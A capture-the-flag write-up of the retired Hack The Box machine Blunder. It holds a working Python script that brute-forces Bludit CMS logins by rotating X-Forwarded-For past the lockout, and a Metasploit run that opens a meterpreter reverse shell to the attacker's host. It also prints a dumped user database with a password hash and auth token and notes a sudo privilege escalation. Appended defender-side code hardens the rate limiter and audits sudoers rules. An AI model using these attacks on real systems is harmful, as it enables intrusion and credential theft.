HTB Machine: Blunder
This article is intended solely for technical exchange, learning and research. Using the techniques it describes for illegal purposes or to cause damage is strictly forbidden, and the author bears no responsibility for any resulting consequences.
The box is a retired machine, run with the author's VIP subscription; it shows the IP address 10.10.10.191.
This time I used https://github.com/Tib3rius/AutoRecon for an automated, all-round scan.
Information enumeration and collection (https://github.com/codingo/Reconnoitre is similar to autorecon):
autorecon 10.10.10.191 -o ./Blunder-autorecon
masscan -p1-65535 10.10.10.191 --rate=1000 -e tun0 > ports
ports=$(cat ports | awk -F " " '{print $4}' | awk -F "/" '{print $1}' | sort -n | tr '\n' ',' | sed 's/,$//')
nmap -Pn -sV -sC -p$ports 10.10.10.191
The scan found only port 80 open, so I opened it in a browser.
Nothing of obvious value, so I looked at the page source.
It confirms the site runs the Bludit CMS, version 3.9.2. A quick search turns up a brute-force mitigation bypass vulnerability; details: https://rastating.github.io/bludit-brute-force-mitigation-bypass/
Next, collect every keyword on the target as a password dictionary, here with cewl: https://github.com/digininja/CeWL
cewl 10.10.10.191 > wordlist.txt
While that runs, brute-force the site's directories, here with the rustbuster binary I usually use.
New directory brute-forcing tool: https://github.com/phra/rustbuster. Download the binary:
wget https://github.com/phra/rustbuster/releases/download/v3.0.3/rustbuster-v3.0.3-x86_64-unknown-linux-gnu -O rustbuster
Probe directories:
./rustbuster dir -u http://10.10.10.191/ -w /usr/share/seclists/Discovery/Web-Content/common.txt -e php,txt,pdf --threads 15
Results:
kali@kali:~/Downloads/htb/blunder$ ./rustbuster dir -u http://10.10.10.191/ -w /usr/share/seclists/Discovery/Web-Content/common.txt -e php,txt,pdf --threads 15
~ rustbuster v3.0.3 ~ by phra & ps1dr3x ~
[?] Started at : 2021-05-08 10:55:03
GET 403 Forbidden http://10.10.10.191/.hta
GET 403 Forbidden http://10.10.10.191/.hta.php
GET 403 Forbidden http://10.10.10.191/.hta.txt
GET 403 Forbidden http://10.10.10.191/.hta.pdf
GET 403 Forbidden http://10.10.10.191/.htaccess
GET 403 Forbidden http://10.10.10.191/.htpasswd
GET 403 Forbidden http://10.10.10.191/.htpasswd.php
GET 403 Forbidden http://10.10.10.191/.htaccess.php
GET 403 Forbidden http://10.10.10.191/.htpasswd.pdf
GET 403 Forbidden http://10.10.10.191/.htaccess.txt
GET 403 Forbidden http://10.10.10.191/.htaccess.pdf
GET 403 Forbidden http://10.10.10.191/.htpasswd.txt
GET 200 OK http://10.10.10.191/0
GET 200 OK http://10.10.10.191/LICENSE
GET 200 OK http://10.10.10.191/about
GET 301 Moved Permanently http://10.10.10.191/admin => http://10.10.10.191/admin/
GET 301 Moved Permanently http://10.10.10.191/cgi-bin/ => http://10.10.10.191/cgi-bin
GET 200 OK http://10.10.10.191/install.php
GET 200 OK http://10.10.10.191/robots.txt
GET 200 OK http://10.10.10.191/robots.txt
GET 403 Forbidden http://10.10.10.191/server-status
GET 200 OK http://10.10.10.191/todo.txt
[00:09:19] ######################################## 18620/18620 ETA: 00:00:00 req/s: 33
[?] Ended at: 2021-05-08 11:04:22
I visited each of them; todo.txt gave some useful information.
It notes that a user fergus is about to be put onto the new blog, and a login page was also found above.
Following the exploit found above, I tested the brute-force mitigation bypass to obtain the account's password; the final password brute-force program, implemented in Python 2, is as follows:
#!/usr/bin/env python3
import re
import requests

host = 'http://10.10.10.191'
login_url = host + '/admin/login'
username = 'fergus'

# load the cewl wordlist, one candidate per line
wordlist = []
words = open('wordlist.txt', 'r')
for line in words:
    line = line.rstrip()
    wordlist.append(line)

for password in wordlist:
    # fresh session per attempt; the login form carries a CSRF token that must be echoed back
    session = requests.Session()
    login_page = session.get(login_url)
    csrf_token = re.search('input.+?name="tokenCSRF".+?value="(.+?)"', login_page.text).group(1)
    print('[*] Trying: {p}'.format(p = password))
    # the lockout counter is keyed on X-Forwarded-For, so a new value each request never trips it
    headers = {
        'X-Forwarded-For': password,
        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.3865.90 Safari/537.36',
        'Referer': login_url
    }
    data = {
        'tokenCSRF': csrf_token,
        'username': username,
        'password': password,
        'save': ''
    }
    login_result = session.post(login_url, headers = headers, data = data, allow_redirects = False)
    # a successful login redirects to the dashboard
    if 'location' in login_result.headers:
        if '/admin/dashboard' in login_result.headers['location']:
            print()
            print('SUCCESS: Password found!')
            print('Use {u}:{p} to login.'.format(u = username, p = password))
            print()
            break
This yields the account and password:
fergus:RolandDeschain
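Added example from the defender's side (not Bludit's code and not part of this writeup): the throttle pattern the script above defeats, which takes the client's identity straight from X-Forwarded-For, next to a variant keyed on the TCP peer that honours the header only when the peer is a trusted proxy. The threshold, the proxy list and the rotating header values are constructed.

```python
# Added example (not Bludit's code): a login throttle keyed on X-Forwarded-For,
# the weakness the script above abuses, beside a variant keyed on the TCP peer.
import ipaddress
from collections import defaultdict
MAX_FAILURES = 10  # constructed lockout threshold

class NaiveLimiter:
    """Weak pattern: the caller's identity is whatever X-Forwarded-For says."""
    def __init__(self):
        self.failures = defaultdict(int)
    def client_id(self, remote_addr, headers):
        return headers.get("X-Forwarded-For", remote_addr)
    def allow(self, remote_addr, headers):
        return self.failures[self.client_id(remote_addr, headers)] < MAX_FAILURES

    def record_failure(self, remote_addr, headers):
        self.failures[self.client_id(remote_addr, headers)] += 1

class HardenedLimiter(NaiveLimiter):
    """Honour the header only when the TCP peer is a proxy we operate."""
    def __init__(self, trusted_proxies=()):
        super().__init__()
        self.trusted = [ipaddress.ip_network(p) for p in trusted_proxies]

    def _trusted(self, ip):
        return any(ip in net for net in self.trusted)

    def client_id(self, remote_addr, headers):
        if not self._trusted(ipaddress.ip_address(remote_addr)):
            return remote_addr  # direct client: the header is attacker-controlled
        # right to left: the nearest hop that is not one of our proxies is the client
        for hop in reversed(headers.get("X-Forwarded-For", "").split(",")):
            try:
                ip = ipaddress.ip_address(hop.strip())
            except ValueError:
                break  # garbage such as a password string: stop trusting the chain
            if not self._trusted(ip):
                return str(ip)
        return remote_addr

def simulate(limiter, attempts, remote_addr="10.10.14.2"):
    """Replay a run from one address that rotates X-Forwarded-For per request
    (as the script above does); return how many attempts were let through."""
    allowed = 0
    for i in range(attempts):
        hdrs = {"X-Forwarded-For": f"guess{i}"}  # constructed header values
        if limiter.allow(remote_addr, hdrs):
            allowed += 1
            limiter.record_failure(remote_addr, hdrs)
    return allowed
```

With the naive limiter every guess from one address gets through; the hardened one locks the address after MAX_FAILURES regardless of what the header says.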
After logging in I spent some time verifying things, and finally confirmed a remote code execution vulnerability that chains file upload with directory traversal. Details: https://github.com/bludit/bludit/issues/1081
For convenience I exploited it directly with metasploit:
msf5 exploit(linux/http/bludit_upload_images_exec) > set lhost 10.10.14.2
lhost => 10.10.14.2
msf5 exploit(linux/http/bludit_upload_images_exec) > set lport 8833
lport => 8833
msf5 exploit(linux/http/bludit_upload_images_exec) > set bludituser fergus
bludituser => fergus
msf5 exploit(linux/http/bludit_upload_images_exec) > set bluditpass RolandDeschain
bluditpass => RolandDeschain
msf5 exploit(linux/http/bludit_upload_images_exec) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf5 exploit(linux/http/bludit_upload_images_exec) > exploit
[-] Exploit failed: One or more options failed to validate: RHOSTS.
[*] Exploit completed, but no session was created.
msf5 exploit(linux/http/bludit_upload_images_exec) > set rhosts 10.10.10.191
rhosts => 10.10.10.191
msf5 exploit(linux/http/bludit_upload_images_exec) > exploit
[*] Started reverse TCP handler on 10.10.14.2:8833
[+] Logged in as: fergus
[*] Retrieving UUID...
[*] Uploading aanOwmocKW.png...
[*] Uploading .htaccess...
[*] Executing aanOwmocKW.png...
[*] Sending stage (38288 bytes) to 10.10.10.191
[*] Meterpreter session 1 opened (10.10.14.2:8833 -> 10.10.10.191:50620) at 2021-05-08 14:16:30 +0800
[+] Deleted .htaccess
meterpreter >
Browsing the web root, I found that besides version 3.9.2 there is also a 3.10.0a install.
www-data@blunder:/var/www/bludit-3.10.0a/bl-content/databases$ cat users.php
cat users.php
<?php defined('BLUDIT') or die('Bludit CMS.'); ?>
{
    "admin": {
        "nickname": "Hugo",
        "firstName": "Hugo",
        "lastName": "",
        "role": "User",
        "password": "faca404fd5c0a31cf1897b823c695c85cffeb98d",
        "email": "",
        "registered": "2019-11-27 07:40:55",
        "tokenRemember": "",
        "tokenAuth": "b380cb62057e9da47afce66b4615107d",
        "tokenAuthTTL": "2009-03-15 14:00",
        "twitter": "",
        "facebook": "",
        "instagram": "",
        "codepen": "",
        "linkedin": "",
        "github": "",
        "gitlab": ""
    }
}
www-data@blunder:/var/www/bludit-3.10.0a/bl-content/databases$
I cracked the password hash with somd5.
Then switched directly to user hugo with su.
Ran sudo -l
and found:
(ALL, !root) /bin/bash
Searching for this on Google gives:
https://www.exploit-db.com/exploits/47502
That points to the privilege escalation vulnerability above; next, check the sudo version on the target.
It falls exactly within the vulnerable version range, so I exploited it directly to escalate privileges.
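Added example (not part of this writeup): an audit helper that flags sudo rules of the (ALL, !root) shape shown above, in either sudoers syntax or sudo -l output, and compares the local sudo version with the first fixed release. The fixed release is supplied by the caller from the exploit-db entry linked above rather than hard-coded; the sudo -l sample is constructed.

```python
# Added example, not from the writeup: flag sudo rules of the "(ALL, !root)"
# shape found above, in sudoers syntax or in `sudo -l` output, and compare the
# local sudo version with the first fixed release the caller takes from the advisory.
import re

ENTRY_RE = re.compile(r"\((?P<runas>[^)]*)\)\s*(?P<cmd>\S.*)$")

def negated_runas_entries(text):
    """Return (runas, command) pairs whose runas user list is ALL minus
    explicitly negated users: a deny-list, which the exploit-db entry linked
    above shows is not a safe way to keep a command away from root."""
    found = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].rstrip()   # strip comments
        m = ENTRY_RE.search(line)
        if not m:
            continue
        user_part = m.group("runas").split(":")[0]  # drop the ':group' half
        users = [u.strip() for u in user_part.split(",")]
        if "ALL" in users and any(u.startswith("!") for u in users):
            found.append((m.group("runas").strip(), m.group("cmd").strip()))
    return found

def sudo_version(sudo_v_output):
    """Parse 'Sudo version 1.8.25p1'-style output into a comparable tuple."""
    m = re.search(r"Sudo version (\d+)\.(\d+)\.(\d+)", sudo_v_output)
    return tuple(int(x) for x in m.groups()) if m else None

def assess(text, sudo_v_output, fixed_version):
    """fixed_version is the first patched release, taken by the caller from the
    advisory (not hard-coded here). The rule is worth rewriting as an allow-list
    on any version; it is only a bypass on releases before the fix."""
    entries = negated_runas_entries(text)
    ver = sudo_version(sudo_v_output)
    return {"entries": entries, "version": ver,
            "bypassable": bool(entries) and ver is not None and ver < tuple(fixed_version)}

# Constructed sample mirroring the `sudo -l` output shown above.
SAMPLE_SUDO_L = """Matching Defaults entries for hugo on blunder:
    env_reset, mail_badpass

User hugo may run the following commands on blunder:
    (ALL, !root) /bin/bash
"""
```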